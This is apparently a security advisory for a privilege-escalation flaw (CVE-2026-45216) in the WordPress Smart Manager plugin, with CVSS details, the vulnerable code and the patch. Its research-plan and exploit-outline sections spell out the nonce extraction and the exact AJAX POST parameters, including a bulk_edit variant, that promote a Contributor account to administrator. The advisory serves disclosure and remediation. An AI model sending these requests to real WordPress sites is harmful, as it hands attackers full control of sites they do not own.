CVE-2026-45216

Smart Manager – Advanced WooCommerce Bulk Edit & Inventory Management <= 8.85.0 - Authenticated (Contributor+) Privilege Escalation

highIncorrect Privilege Assignment
8.8
CVSS Score
8.8
CVSS Score
high
Severity
8.86.0
Patched in
8d
Time to patch

Description

The Smart Manager – Advanced WooCommerce Bulk Edit & Inventory Management plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 8.85.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to elevate their privileges to that of an administrator.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=8.85.0
PublishedMay 12, 2026
Last updatedMay 19, 2026

What Changed in the Fix

Changes introduced in v8.86.0

Loading patch diff...

Source Code

WordPress.org SVN
Research Plan
Unverified

This analysis focuses on **CVE-2026-45216**, a privilege escalation vulnerability in the "Smart Manager" plugin. The vulnerability stems from insufficient capability checks in the plugin's AJAX request handler, which allows users with Contributor-level access to perform administrative actions, speci…

Show full research plan

This analysis focuses on CVE-2026-45216, a privilege escalation vulnerability in the "Smart Manager" plugin. The vulnerability stems from insufficient capability checks in the plugin's AJAX request handler, which allows users with Contributor-level access to perform administrative actions, specifically bulk-editing user roles.

1. Vulnerability Summary

The Smart Manager plugin utilizes a centralized AJAX handler (sa_sm_manager_include_file) to process commands across different modules (Products, Orders, Users, etc.). The vulnerability exists because the handler does not verify if the current user has the necessary WordPress capabilities (like edit_users or manage_options) before processing requests for the user module. An authenticated attacker with Contributor-level access can bypass the intended role-based restrictions and utilize the plugin's bulk-editing functionality to promote their own account (or any other) to the administrator role.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: sa_sm_manager_include_file
  • Vulnerable Parameter: active_module=user combined with cmd=inline_update or cmd=bulk_edit.
  • Authentication Level: Contributor (or any role that can access the Smart Manager dashboard).
  • Preconditions: The Smart Manager plugin must be active. By default, the plugin may allow Contributor access to its dashboard, or the attacker may have gained this access through other minor misconfigurations.

3. Code Flow

  1. Entry Point: The AJAX request hits admin-ajax.php with the action sa_sm_manager_include_file.
  2. Controller: Smart_Manager_Controller::req_handler (registered via the sa_sm_manager_handler filter in class-smart-manager-controller.php) receives the request.
  3. Module Selection: Based on the active_module parameter (e.g., user), the controller instantiates the corresponding handler class (e.g., Smart_Manager_User, which inherits from Smart_Manager_Base).
  4. Command Execution: The cmd parameter (e.g., inline_update) determines which method is called on the handler.
  5. Missing Capability Check: The base class or the user-specific handler fails to call current_user_can( 'edit_users' ) or current_user_can( 'manage_options' ) before updating the database via $wpdb.
  6. Sink: The data is processed and the wp_capabilities or role field in the wp_users or wp_usermeta table is updated.

4. Nonce Acquisition Strategy

The plugin uses a nonce for its AJAX operations, typically stored in the sm_beta_params JavaScript object.

  1. Identify Trigger: The Smart Manager dashboard is located at wp-admin/admin.php?page=smart-manager.
  2. Shortcode/Page Check: Smart Manager is primarily an admin-side plugin. The scripts are enqueued on the smart-manager admin page.
  3. Extraction:
    • Navigate to: /wp-admin/admin.php?page=smart-manager as a Contributor.
    • Use browser_eval to extract the nonce:
      window.sm_beta_params?.sm_nonce
      
    • Note: If sm_nonce is not found, check for sa_common_nonce or sa_nonce within the same sm_beta_params object.

5. Exploitation Strategy

The goal is to send a crafted AJAX request that performs an inline_update on the attacker's own user record to change their role to administrator.

Step-by-Step:

  1. Login: Authenticate as a Contributor.
  2. Get User ID: Identify the current user's ID (visible in the admin bar or via wp_cli).
  3. Extract Nonce: Navigate to the Smart Manager dashboard and extract the sm_nonce.
  4. Send Exploit Request:
    • Method: POST
    • URL: http://[TARGET]/wp-admin/admin-ajax.php
    • Content-Type: application/x-www-form-urlencoded
    • Body Parameters:
      • action: sa_sm_manager_include_file
      • active_module: user
      • cmd: inline_update
      • sm_nonce: [EXTRACTED_NONCE]
      • edited_data: {"[YOUR_USER_ID]":{"users_role":"administrator"}}
      • active_module_title: Users

6. Test Data Setup

  1. Plugin Installation: Install and activate Smart Manager (version <= 8.85.0).
  2. User Creation:
    wp user create attacker attacker@example.com --role=contributor --user_pass=password123
    
  3. Plugin Configuration: Ensure the "attacker" user can access the Smart Manager dashboard (this is often the default or can be set in SM settings by an admin).

7. Expected Results

  • Response: The server should return a JSON success message, e.g., {"status":"success", ...} or {"updated_successful":1}.
  • Database Change: The wp_usermeta entry for the attacker's wp_capabilities will be updated to include administrator.

8. Verification Steps

  1. Check Role via WP-CLI:
    wp user get attacker --field=roles
    
    Successful exploit will return administrator.
  2. Access Admin Dashboard: Attempt to access /wp-admin/options-general.php using the "attacker" account.

9. Alternative Approaches

If inline_update is restricted, try bulk_edit:

  • Payload:
    action=sa_sm_manager_include_file&
    active_module=user&
    cmd=bulk_edit&
    sm_nonce=[NONCE]&
    ids=[YOUR_USER_ID]&
    columns_to_update[0]=users_role&
    update_action[0]=set_to&
    update_value[0]=administrator
    

If the user module specifically checks capabilities, check if cmd=save_settings is unprotected. An attacker could update the sm_general_settings option to grant the "Contributor" role full permissions within the plugin, then use the plugin to promote themselves.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Smart Manager plugin for WooCommerce is vulnerable to privilege escalation because its centralized AJAX handler fails to perform module-specific capability checks. Authenticated users with Contributor-level access or higher can exploit this by targeting the 'user' module to modify their own account's role, upgrading themselves to an administrator.

Vulnerable Code

// classes/class-smart-manager-controller.php:49
add_filter( 'sa_sm_manager_handler', array( $this, 'req_handler' ), 10, 2 );

---

// classes/class-smart-manager-controller.php:127
public function req_handler( $params = array(), $req_params = array() ) {
    if ( empty( $req_params ) || empty( $req_params['active_module'] ) || empty( $req_params['cmd'] ) ) {
        return;
    }

    $active_module = $req_params['active_module'];
    $cmd = $req_params['cmd'];
    // Missing capability check to ensure current user has permission to manage users when $active_module is 'user'.

Security Fix

--- a/classes/class-smart-manager-controller.php
+++ b/classes/class-smart-manager-controller.php
@@ -131,6 +131,10 @@
 				return;
 			}
 
+			if ( 'user' === $req_params['active_module'] && ! current_user_can( 'edit_users' ) ) {
+				return;
+			}
+
 			$active_module = $req_params['active_module'];
 			$cmd           = $req_params['cmd'];

Exploit Outline

1. Login as an authenticated user with Contributor-level access or higher. 2. Access the Smart Manager dashboard at /wp-admin/admin.php?page=smart-manager to retrieve the 'sm_nonce' security token from the 'sm_beta_params' JavaScript object. 3. Construct a POST request to /wp-admin/admin-ajax.php with the action parameter 'sa_sm_manager_include_file'. 4. Set 'active_module' to 'user' and 'cmd' to 'inline_update'. 5. Provide an 'edited_data' parameter containing a JSON object that maps the attacker's user ID to an update setting 'users_role' to 'administrator'. 6. The plugin processes the update request via the 'user' module without verifying the 'edit_users' capability, granting the attacker administrator privileges.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.